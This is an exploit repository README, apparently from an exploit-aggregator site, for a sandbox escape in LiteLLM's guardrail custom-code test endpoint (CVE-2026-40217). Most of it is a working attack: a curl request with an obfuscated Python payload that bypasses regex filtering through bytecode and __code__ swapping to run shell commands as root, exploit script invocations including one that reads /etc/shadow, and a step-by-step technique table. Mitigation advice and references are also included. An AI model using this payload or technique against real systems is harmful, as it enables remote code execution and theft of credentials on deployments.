Share
## https://sploitus.com/exploit?id=B01AF870-0BB7-5045-8F8B-19C856066EE7
# CVE-2026-40217 โ€” LiteLLM Guardrail Sandbox Escape

> **LiteLLM** `POST /guardrails/test_custom_code` โ€” Sandbox Escape leading to **Remote Code Execution (RCE)** as **root** in default Docker deployment.

| Field | Value |
|-------|-------|
| CVE | **CVE-2026-40217** |
| CVSS | **8.8 (HIGH)** โ€” `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` |
| CWE | CWE-913 (Improper Control of Dynamically-Managed Code Resources) / CWE-94 |
| Affected | LiteLLM โ‰ค **2026-04-08** (pre-v1.83.11) |
| Fixed | **v1.83.11+** (replaced hand-rolled sandbox with `RestrictedPython`) |
| Discoverer | Markus Vervier โ€” [X41 D-Sec GmbH](https://x41-dsec.de) |
| Published | 2026-04-08 |
| Link | [X41 Advisory](https://x41-dsec.de/lab/advisories/x41-2026-001-litellm/) โ€ข [GHSA-wxxx-gvqv-xp7p](https://github.com/advisories/GHSA-3926-2jvf-fg29) โ€ข [oss-security](https://www.openwall.com/lists/oss-security/2026/04/09/1) |

---

## Description

The `POST /guardrails/test_custom_code` endpoint in LiteLLM allows authenticated users to submit arbitrary Python code for guardrail testing. The endpoint attempts to restrict dangerous operations using **regex-based source code filtering**, but this can be completely bypassed using **CPython bytecode rewriting techniques**, leading to **arbitrary code execution** in the proxy process. In the default Docker image, the proxy runs as **root**, compounding the impact.

---

## Proof of Concept

### Prerequisites

```bash
# Install Python dependencies (required by exploit.py)
pip install -r requirements.txt
```

### Quick Start (Docker)

> **โš ๏ธ Important:** The `docker-compose.yml` pins the vulnerable image to a specific digest
> (`sha256:7c311546...`) from March 22, 2026. Do **not** change the tag to `main-latest`
> or any newer version โ€” later images may already contain the fix (RestrictedPython)
> even if the version number suggests otherwise (e.g., `v1.83.10-stable` was rebuilt
> post-patch and is **not** vulnerable).

```bash
# 1. Install dependencies (if not already done)
pip install -r requirements.txt

# 2. Start a vulnerable LiteLLM instance
docker compose up -d

# 3. Run the exploit
python3 exploit/exploit.py --target http://localhost:4000 --key "sk-litellm-master-key"

# 4. Read sensitive files (change the --cmd argument)
python3 exploit/exploit.py --target http://localhost:4000 --key "sk-litellm-master-key" \
    --cmd "cat /etc/shadow"

# Or using curl directly
curl -s -X POST \
  -H "Authorization: Bearer sk-litellm-master-key" \
  -H "Content-Type: application/json" \
  http://localhost:4000/guardrails/test_custom_code \
  -d '{
    "custom_code": "def apply_guardrail(inputs, request_data, input_type):\n    obj = str.mro()[1]\n    def g(fn):\n        yield fn.placeholder\n    c = g(None).gi_code\n    gn = \"_\"+\"_gl\"+\"ob\"+\"als\"+\"_\"+\"_\"\n    cn = \"_\"+\"_co\"+\"de_\"+\"_\"\n    obj.__setattr__(g, cn, c.replace(co_names=(gn,)))\n    for v in g(http_get):\n        gd = v\n        break\n    bn = \"_\"+\"_bu\"+\"ilt\"+\"ins\"+\"_\"+\"_\"\n    imp = gd[bn][\"_\"+\"_im\"+\"po\"+\"rt_\"+\"_\"]\n    return {\"rce\": imp(\"os\").popen(\"id\").read()}",
    "test_input": {"messages": [{"role": "user", "content": "test"}]}
  }'
```

### Expected Result

```json
{"success":true,"result":{"rce":"uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)\n"},"error":null,"error_type":null}
```

---

## Sandbox Escape Technique (6 Steps)

| Step | Technique | Code |
|------|-----------|------|
| 1 | **Regex bypass** via string concatenation | `"_"+"_gl"+"ob"+"als"+"_"+"_"` |
| 2 | Obtain `object` class via `str.mro()[1]` | `obj = str.mro()[1]` |
| 3 | Access generator code object via `gi_code` | `c = g(None).gi_code` |
| 4 | Swap function `__code__` via `object.__setattr__` | `obj.__setattr__(g, cn, c.replace(co_names=(gn,)))` |
| 5 | Extract real builtins from `http_get.__globals__` | `imp = gd["__builtins__"]["__import__"]` |
| 6 | Achieve RCE via `os.popen` | `imp("os").popen("id").read()` |

---

## Repository Structure

```
CVE-2026-40217/
โ”œโ”€โ”€ README.md                  # This file
โ”œโ”€โ”€ docker-compose.yml         # One-command vulnerable environment
โ”œโ”€โ”€ requirements.txt           # Dependencies
โ”œโ”€โ”€ exploit/
โ”‚   โ”œโ”€โ”€ exploit.py             # Full exploit script
โ”‚   โ””โ”€โ”€ payload.py             # Bytecode payload module
โ”œโ”€โ”€ docs/
โ”‚   โ””โ”€โ”€ advisory.md            # Translated advisory details
โ””โ”€โ”€ screenshots/               # Proof screenshots
```

---

## Mitigation

1. **Upgrade** to LiteLLM **v1.83.11+** (uses `RestrictedPython` instead of hand-rolled sandbox)
2. **Block** `/guardrails/test_custom_code` at your reverse proxy / API gateway
3. **Restrict** master key to trusted administrators only
4. **Run as non-root** in Docker: `docker run --user 1000:1000 ...`
5. **Do not** expose the management interface to untrusted networks

---

## References

- [X41 D-SEC Advisory x41-2026-001](https://x41-dsec.de/lab/advisories/x41-2026-001-litellm/)
- [GitHub Advisory GHSA-wxxx-gvqv-xp7p](https://github.com/advisories/GHSA-3926-2jvf-fg29)
- [GitLab Advisory](https://advisories.gitlab.com/pypi/litellm/CVE-2026-40217/)
- [oss-security disclosure](https://www.openwall.com/lists/oss-security/2026/04/09/1)
- [NVD Detail](https://nvd.nist.gov/vuln/detail/CVE-2026-40217)

---

> **Disclaimer:** This content is provided for **educational purposes and authorized security testing only.**